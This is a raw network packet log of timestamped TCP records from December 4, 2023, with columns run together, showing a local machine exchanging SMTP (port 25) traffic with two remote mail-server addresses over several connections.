                                                                                                                                                                                                          Dec 4, 2023 12:56:40.174200058 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.175009966 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.183721066 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.183917999 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.223534107 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.224186897 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.280219078 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.284826994 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.285348892 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.293649912 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.293864965 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.333774090 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.334435940 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.390140057 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.391062021 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.395299911 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.395486116 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.403547049 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.403779984 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.444291115 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.444888115 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.500569105 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.501164913 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.505084038 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.513955116 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.554704905 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.555111885 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.611028910 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.611542940 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.664623976 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.665050030 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.721235037 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.721709013 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.774637938 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.775090933 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.831301928 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.832009077 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.884737015 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.885323048 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.942347050 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.943157911 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.995989084 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:40.996587038 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.052815914 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.053473949 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.106256962 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.106914043 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.164062977 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.164989948 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.216492891 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.217109919 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.274772882 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.275427103 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.327020884 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.327683926 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.385009050 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.385731936 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.437407970 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.437994957 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.489701033 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.495373964 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.496011972 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.547631025 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.548441887 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.598632097 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.599337101 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.599993944 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.605528116 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.605679989 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.657497883 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.658198118 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.658711910 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.708525896 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.709460020 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.709760904 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.715430975 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.767359018 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.768333912 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.770221949 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.819313049 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.878148079 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:42.095674038 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:42.097599030 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:56:42.207984924 CET254972967.195.204.73192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:42.208076954 CET4972925192.168.2.467.195.204.73
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.045737028 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.047595978 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.068680048 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.146452904 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.146541119 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.148972988 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.149050951 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.154993057 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.175930977 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.176013947 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.257359028 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.257536888 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.403122902 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.403768063 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.403778076 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.404798031 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.409427881 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.419950962 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.422151089 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.423943996 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.516428947 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.529768944 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.532470942 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.533162117 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.534482002 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.536796093 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.537074089 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.539388895 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.540133953 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.542522907 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.542678118 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.545432091 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.639663935 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.641387939 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.642986059 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.646862030 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.649872065 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.651273012 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.651331902 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.652561903 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.653894901 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.657655954 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.660744905 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.662106991 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.752290010 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.758523941 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.761292934 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.775948048 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.787641048 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.788943052 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.835818052 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.837755919 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.889794111 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.891865969 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.894953012 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.897653103 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.902781010 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.904200077 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.925029993 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.938929081 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.947329998 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.992743015 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.993170977 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.999114037 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.000849009 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.010843992 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.019728899 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.024491072 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.026129961 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.032809973 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.036010027 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.044749975 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.059597015 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.061610937 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.086412907 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.097965002 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.098586082 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.125574112 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.128675938 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.131398916 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.131881952 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.136765003 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.140007973 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.143328905 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.145510912 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.148550034 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.151701927 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.167352915 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.168035030 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.199892998 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.201601982 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.202126980 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.202135086 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.234417915 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.236248016 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.237102985 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.238950968 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.246592999 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.247757912 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.254246950 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.255362034 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.256280899 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.256306887 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.258682013 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.259505033 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.272749901 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.274352074 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.309807062 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.312207937 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.312422991 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.316638947 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.340756893 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.342566967 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.343600035 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.353533030 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.359404087 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.362243891 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.363970041 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.377681017 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.416599035 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.424806118 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.446439981 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.446454048 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.446459055 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.449630976 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.451631069 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.550317049 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.550333023 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.550766945 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.551161051 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.555433989 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.555442095 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.555944920 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.556142092 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.653292894 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.654366970 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.654704094 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.656079054 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.657428026 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.658567905 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.662872076 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.664339066 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.756032944 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.756747961 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.757961035 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.759139061 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.759145975 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.760742903 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.770781040 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.771869898 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.859277010 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.860765934 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.863163948 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.877808094 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.897964954 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.898000002 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.898004055 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.898047924 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.998435020 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.998578072 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.998847961 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.999397993 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.999774933 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:10.999778986 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.005678892 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.006114006 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.104830027 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.105770111 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.106152058 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.106240988 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.108205080 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.108669996 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.113318920 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.114782095 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.198849916 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.199176073 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.199503899 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.209424019 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.210266113 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.213062048 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.213931084 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.215217113 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.215904951 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.224893093 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.239825010 CET4973925192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.303436995 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.303445101 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.303457022 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.305624962 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.305944920 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.307322025 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.313375950 CET2549736172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.313611984 CET4973625192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.318924904 CET2549738172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.318944931 CET2549737172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.319271088 CET4973825192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.319307089 CET4973725192.168.2.4172.253.115.27
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.347660065 CET2549739172.253.115.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:11.349315882 CET4973925192.168.2.4172.253.115.27
